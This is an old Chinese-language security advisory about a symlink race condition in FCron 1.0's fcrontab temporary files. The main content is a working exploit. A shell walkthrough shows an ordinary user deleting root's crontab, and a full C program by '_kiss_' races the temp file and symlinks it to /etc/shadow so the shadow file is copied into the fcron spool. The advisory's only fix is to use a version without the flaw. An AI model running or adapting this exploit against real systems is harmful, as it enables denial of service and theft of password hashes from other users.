Thibault Godouet Fcron存在符号连接漏洞发布时间:2001-06-13 更新时间:2001-06-13 严重程度:中 威胁程度:本地拒绝服务 错误类型:竞争条件 利用方式:服务器模式 受影响系统 Thibault Godouet FCron 1.0详细描述 FCron是一个定时可执行程序的UNIX程序,可以以特定用户运行。不过由于fcrontab在/tmp目录下不安全的建立了临时文件,造成符号连接漏洞,可以使攻击者建立符号连接到其他fcron用户的文件,造成不同程度的拒绝服务攻击。 测试代码 1,安装一crontab,以root用户举例: root# ls -l /var/spool/fcron/ total 0 root# echo '0 0 * * * echo test' | fcrontab - 09:53:00 installing file /tmp/fcrontab.27301 for user root Modifications will be taken into account right now. root# ls -l /var/spool/fcron/ total 2 -rw------- 1 root root 110 May 7 09:53 root -rw------- 1 root fcron 20 May 7 09:53 root.orig 2,作为普通用户写和执行脚本: uwe$ cat ~/x #! /bin/sh ln -s /var/spool/fcron/rm.root /tmp/fcrontab.$$ exec fcrontab - <<EOF * * * * * false EOF uwe$ ./x 09:55:55 installing file /tmp/fcrontab.27536 for user uwe 09:55:55 User uwe can't read file "/tmp/fcrontab.27536": Permission denied 3,ROOT用户查看fcron spool目录: root# ls -l /var/spool/fcron/ total 3 -rw-r----- 1 uwe fcron 16 May 7 09:55 rm.root -rw------- 1 root root 110 May 7 09:53 root -rw------- 1 root fcron 20 May 7 09:53 root.orig 4,以普通用户编辑crontab: uwe$ echo '* * * * * true' | fcrontab - 09:59:15 installing file /tmp/fcrontab.27543 for user uwe Modifications will be taken into account at 10h00. 5,以ROOT用户等1分钟,然后查看fcron spool目录: # ls -l /var/spool/fcron/ total 3 -rw------- 1 root fcron 20 May 7 09:53 root.orig -rw------- 1 root root 102 May 7 09:59 uwe -rw-r----- 1 fcron fcron 15 May 7 09:59 uwe.orig 6,root的crontab已经没有了,查看你的备份。 /* -------------------------- fcrontab exploit by _kiss_ -------------------------- */ #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <time.h> #include <dirent.h> #define TRUE 1 void main() { struct stat buf; time_t modif1,modif2; DIR *dir; struct dirent *direntry; int found=0; char string[200]; char string2[200]; printf ("---------------------------------------------\n"); printf (" fcrontab exploit by _kiss_\n"); printf (" Helios Security and Administration (HeliSec)\n\n"); printf (" Greets: Jet-Li (for teaching me some lessons of shell\n"); printf (" that i will need someday) :D\n"); printf ("---------------------------------------------\n"); /* we wait till /tmp/fcrontab is created */ printf("\nwaiting for /tmp/fcrontab to be created...\n"); while(!found) { dir=opendir("/tmp"); while ((direntry=readdir(dir))!=NULL) { if (strncmp("fcrontab",direntry->d_name,8)==0) found=1; if (found==1) break; } closedir(dir); } strcpy(string,"/tmp/"); strcat(string,direntry->d_name); while (TRUE) { if (stat(string,&buf)!=-1) break; } /* we store date of last modification */ printf("/tmp/fcrontab created. waiting for the update...\n"); modif1=buf.st_mtime; /* we wait till /tmp/fcrontab is updated */ do { stat(string,&buf); modif2=buf.st_mtime; } while (modif1==modif2); /* we make the symlink */ printf("making a symlink to /etc/shadow...\n"); strcpy(string2,"ln -fs /etc/shadow "); strcat(string2,string); system(string2); /* we should now have /etc/shadow in /var/spool/fcron/kiss.orig */ printf("... now check /var/spool/fcron/kiss.orig\n"); } 解决方案 使用不存在此漏洞的版本。 相关信息 |
